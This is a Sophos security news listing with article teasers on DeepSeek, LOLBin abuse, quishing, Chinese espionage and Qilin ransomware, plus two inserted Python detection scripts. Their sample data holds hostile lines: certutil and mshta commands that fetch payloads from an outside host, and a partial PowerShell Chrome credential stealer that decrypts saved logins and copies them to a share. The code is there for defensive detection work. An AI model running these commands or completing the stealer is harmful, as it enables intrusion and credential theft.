News


An assessment of DeepSeek
SophosNews

Because DeepSeek is released as open source, it can be explored and researched by criminally motivated individuals and neutral enthusiasts alike. As with Meta's LLaMA, DeepSeek can be freely experimented with, and its guardrails can largely be removed. This could lead to abuse by cybercriminals. However, operating DeepSeek professionally still requires far more resources than the average cybercriminal has at their disposal. Much more pressing for companies is the fact that DeepSeek is likely to be integrated into a range of products by various companies because of its cost-effectiveness, which potentially poses significant risks to the...

Read more

Report: Trusted Windows applications abused

In its new Active Adversary Report 2024, Sophos exposes the wolf in sheep's clothing: cybercriminals are increasingly relying on trusted Windows applications for their attacks. The criminal use of what are known as "living off the land" binaries (LOLBins) has increased by 51 percent. LockBit remains the number one ransomware despite law enforcement intervention. Sophos' new Active Adversary Report, entitled "The Bite from Inside," provides a detailed look at the changing behaviors and techniques of attackers in the first half of 2024. The analysis data comes from almost 200 incident response cases that the Sophos X-Ops IR team and Sophos X-Ops Managed...
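Living off the land works precisely because the binaries involved are signed Microsoft tools that every host runs legitimately, so detection has to look at the command line and the parent process rather than the image name alone. The following is an added example (not Sophos code and not taken from the report): a small rule set over constructed process-creation events in a simplified key=value layout. The rules, the host names and the 198.51.100.7 address are illustrative assumptions; a real deployment would use a fuller rule set such as the LOLBAS project's and the telemetry schema of its own EDR or Sysmon configuration.

```python
"""Flag living-off-the-land binary (LOLBin) abuse in process-creation telemetry.

Added example for this page, not Sophos code. Log lines are constructed and
use a simplified key=value layout; the LOLBin rules are a small illustrative
subset, not a complete rule set.
"""
import re
from dataclasses import dataclass

# One process-creation event per line: host, parent image, image, quoted command line.
LINE_RE = re.compile(
    r'host=(?P<host>\S+) parent=(?P<parent>.+?) image=(?P<image>.+?) cmd="(?P<cmd>.*)"$'
)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# (binary, pattern over its command line, finding). Illustrative rules only:
# each one targets a use of the tool that has no place in normal administration.
LOLBIN_RULES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*https?://", re.I), "certutil used as a downloader"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I), "mshta running remote or inline script"),
    ("regsvr32.exe", re.compile(r"/i:\S*https?://|scrobj\.dll", re.I), "regsvr32 loading a remote scriptlet"),
    ("rundll32.exe", re.compile(r"javascript:|\\AppData\\Local\\Temp\\", re.I), "rundll32 running script or a DLL from Temp"),
    ("bitsadmin.exe", re.compile(r"/transfer\b", re.I), "bitsadmin download job"),
    ("wmic.exe", re.compile(r"process\s+call\s+create", re.I), "wmic spawning a process"),
]
LOLBINS = {name for name, _, _ in LOLBIN_RULES}
# A document viewer has no business launching scripting hosts or LOLBins.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def parse_events(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:  # blank or unparseable lines are skipped
            events.append(ProcessEvent(m["host"], m["parent"], m["image"], m["cmd"]))
    return events


def classify(ev: ProcessEvent):
    """Return the list of findings for one event (empty when nothing is suspicious)."""
    findings = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    for binary, pattern, finding in LOLBIN_RULES:
        if image == binary and pattern.search(ev.command_line):
            findings.append(finding)
    if parent in OFFICE_PARENTS and image in LOLBINS | SCRIPT_HOSTS:
        findings.append(f"{image} spawned by Office process {parent}")
    return findings


def scan(lines):
    """(host, image, findings) for every event that triggered at least one rule."""
    hits = []
    for ev in parse_events(lines):
        findings = classify(ev)
        if findings:
            hits.append((ev.host, basename(ev.image), findings))
    return hits


# Constructed sample telemetry: two benign uses of certutil/regsvr32 and three abuses.
SAMPLE_LOG = r"""
host=WS01 parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE image=C:\Windows\System32\certutil.exe cmd="certutil -urlcache -split -f http://198.51.100.7/a.txt C:\Users\alice\AppData\Local\Temp\a.exe"
host=WS02 parent=C:\Windows\explorer.exe image=C:\Windows\System32\certutil.exe cmd="certutil -hashfile C:\Users\bob\Downloads\setup.msi SHA256"
host=SRV01 parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\mshta.exe cmd="mshta http://198.51.100.7/x.hta"
host=WS03 parent=C:\Windows\System32\services.exe image=C:\Windows\System32\regsvr32.exe cmd="regsvr32 /s C:\Program Files\Vendor\lib.dll"
host=WS04 parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\rundll32.exe cmd="rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start"
"""

if __name__ == "__main__":
    for host, image, findings in scan(SAMPLE_LOG.splitlines()):
        print(host, image, "; ".join(findings))
```

The benign certutil hash check and the vendor DLL registration pass through untouched, while the Office-spawned downloader is flagged twice (once for the command line, once for the parent). Keep the parent-process rule: it catches new LOLBins before a command-line signature exists for them.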

Read more

Cybertrends 2025 – what to expect

What does 2025 mean for cyber security in companies? Which cyber attacks will become more frequent, which industries are particularly targeted, and what role will AI play in the future? The last few years have shown that in cyber security you have to be prepared for anything. Since no one can see into the future, it is worth looking back at 2024 in order to evaluate developments, anticipate possible scenarios, adapt, and look to the new year with confidence. Security is well positioned, but vigilance is and remains the top priority. Because...

Read more

XDR: AI functions detect and defend against threats

When it comes to detecting and neutralizing threats, every minute can be critical for security professionals, including managed service providers (MSPs). Generative AI features in Sophos XDR detect threats and repel them faster. To further optimize response and forensic investigations, Sophos has now enhanced its Extended Detection and Response (XDR) platform with new artificial intelligence (AI) features. The new generative AI features speed up and simplify investigations, allowing even less experienced analysts to carry out the necessary security operations and neutralize adversaries faster. The most important new features include: Optimized search...

Read more

DA-CH Cyber Protection: Companies feel well positioned

According to figures from the Sophos Management Study, the growing threat of cyber attacks and the resulting potential economic consequences have prompted most companies in Germany, Austria and Switzerland to invest even more in IT security. As a result, most companies are satisfied with the status of their cyber protection. In Switzerland, most of those surveyed (80 percent overall) feel well (66 percent) or very well (14 percent) prepared against cyber attacks. In Austria, too, people are satisfied with their cyber protection; here it is...

Read more

Cat-and-mouse game with nation-state opponents in China

Sophos has published the report "Pacific Rim", which details a years-long cat-and-mouse game of attack and defense operations with several Chinese state-backed groups. The attacks focused on network perimeter devices, including Sophos firewalls. The attackers ran a series of campaigns with novel exploits and tailored malware to embed tools for surveillance, sabotage and cyberespionage, overlapping with the tactics, techniques and procedures (TTPs) of well-known Chinese nation-state groups such as Volt Typhoon, APT31 and APT41. The adversaries carried out both small and large attacks, primarily in South and Southeast Asia.

Read more

Bosses think IT security is “easy”

One in four people responsible for IT security in companies have to listen to superiors telling them that cyber security is very simple. External security services play a less important role in very small and very large companies than on average, but probably for very different reasons. After asking IT employees in German SMEs and large companies about their stress levels, its causes and how their superiors deal with it, Sophos also wanted to find out about the difficulties of dealing with cyber security in companies of different sizes. A lack of qualified security experts and the rapid pace of cyber threats -...

Read more

Quishing: Phishing with QR codes

To paraphrase Albert Einstein, one could probably say that people's criminal ingenuity is infinite. The latest trend, quishing, proves once again that cyber criminals are not missing out on any opportunity. The experts at Sophos X-Ops have taken a closer look at the latest wave of infiltration via QR codes. When cyber criminals combine their phishing methods with otherwise harmless QR codes, this is known as "quishing". The tactic has now become so popular that there are already entire campaigns built on it. The analysts at Sophos X-Ops have just uncovered a campaign in which a...

Read more

Chinese-sponsored espionage operation Crimson Palace
SophosNews

Sophos has released its new report, "Crimson Palace: New Tools, Tactics, Targets," on a Chinese state-sponsored espionage operation. The report details the latest developments in a nearly two-year-long Chinese cyber espionage campaign in Southeast Asia. Sophos experts first reported their discoveries, titled Operation Crimson Palace, in June of this year, detailing Chinese state activity within a high-level government organization by three separate clusters: Cluster Alpha, Cluster Bravo and Cluster Charlie. After a brief pause in August 2023, Sophos X-Ops spotted renewed Cluster Bravo and Cluster Charlie activity...

Read more

Qilin ransomware steals login credentials from Chrome
SophosNews

During an investigation into a Qilin ransomware attack, the Sophos X-Ops team found that the attackers were stealing credentials stored in Google Chrome browsers on certain network endpoints. The Qilin group, which has been active for over two years, gained access through compromised credentials and manipulated group policies so that a PowerShell script collecting Chrome credentials was run. The script was triggered whenever a user logged in.

Attackers collect credentials using a PowerShell script

The cybercriminals used the PowerShell script to collect credentials from networked endpoints and were able to avoid the lack of…
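Two properties of the technique described above are detectable: the script has to touch Chrome's credential store (the Login Data SQLite database and the DPAPI-protected key in Local State), and because it is pushed through group policy it runs identically under many different user accounts shortly after logon. The following is an added example (not Sophos X-Ops code) that triages constructed PowerShell script block logging records (Event ID 4104) on both counts. The events, hosts, users and indicator weights are assumptions; the "malicious" block is a deliberately incomplete sketch used only as detection input.

```python
"""Triage PowerShell script-block logs (Event ID 4104) for Chrome credential theft.

Added example for this page, not Sophos X-Ops code. The events, hosts and
users below are constructed; the indicator weights are assumptions.
"""
import hashlib
import re
from collections import defaultdict

# indicator name -> (pattern over ScriptBlockText, weight)
INDICATORS = {
    "chrome_login_db": (re.compile(r'\\User Data\\[^\\"]*\\Login Data', re.I), 3),
    "chrome_local_state": (re.compile(r"Local State.*?(os_crypt|encrypted_key)", re.I | re.S), 2),
    "dpapi_unprotect": (re.compile(r"CryptUnprotectData|ProtectedData\]::Unprotect", re.I), 2),
    "sqlite_access": (re.compile(r"System\.Data\.SQLite|sqlite3", re.I), 1),
    "network_egress": (re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|\\\\\w+\\\w+", re.I), 1),
}
# Assumption: the Login Data path plus any decryption hint, or several weaker hints, is worth an alert.
ALERT_THRESHOLD = 4


def score_block(text):
    """(score, matched indicator names) for one script block."""
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits


def triage(events):
    """Events whose script block scores at or above the alert threshold."""
    alerts = []
    for ev in events:
        score, hits = score_block(ev["script"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev["host"], "user": ev["user"], "score": score, "indicators": hits})
    return alerts


def block_id(text):
    """Whitespace-normalised SHA-256 so the same script hashes the same on every host."""
    return hashlib.sha256(" ".join(text.split()).encode()).hexdigest()[:16]


def deployment_spread(events, min_users=3):
    """Identical script bodies executed under many accounts point to a centrally
    pushed script (for example a GPO logon script) rather than one user's action."""
    users = defaultdict(set)
    for ev in events:
        users[block_id(ev["script"])].add(ev["user"])
    return [(bid, sorted(u)) for bid, u in users.items() if len(u) >= min_users]


# Constructed script blocks. The first is an incomplete sketch of the pattern
# described in the article, not a working stealer; the other two are benign.
MALICIOUS_BLOCK = r"""
$src = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
$tmp = "$env:TEMP\ld.db"
Copy-Item $src $tmp
$state = Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json
$blob = [Convert]::FromBase64String($state.os_crypt.encrypted_key)
$masterKey = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $null, 'CurrentUser')
# rows read via System.Data.SQLite, decrypted with $masterKey, written next to the copy
Copy-Item $tmp "\\FS01\logs\$env:USERNAME.db"
"""
BENIGN_LISTING = r"""
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data" -Directory | Select-Object Name
"""
BENIGN_DPAPI = r"""
$blob = [IO.File]::ReadAllBytes("C:\ProgramData\Backup\token.bin")
$token = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $null, 'LocalMachine')
Invoke-RestMethod -Uri https://backup.example.internal/api/heartbeat -Headers @{ Authorization = "Bearer $token" }
"""

# Constructed 4104 records reduced to the fields the triage needs.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "script": MALICIOUS_BLOCK},
    {"host": "WS02", "user": "bob", "script": MALICIOUS_BLOCK},
    {"host": "WS07", "user": "carol", "script": MALICIOUS_BLOCK},
    {"host": "WS03", "user": "dave", "script": BENIGN_LISTING},
    {"host": "SRV02", "user": "svc_backup", "script": BENIGN_DPAPI},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
    for bid, users in deployment_spread(SAMPLE_EVENTS):
        print("same script under", len(users), "accounts:", bid, users)
```

The backup service's own DPAPI use scores below the threshold because it never touches a browser profile, while the GPO-delivered block is caught twice: by its content and by the fact that one script body ran under three different accounts. Script block logging must be enabled for 4104 records to exist at all, and since it records what the engine actually executed it sees through simple obfuscation; the spread check, however, only needs a hash of the body and can be run against any source that captures the script text.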

Read more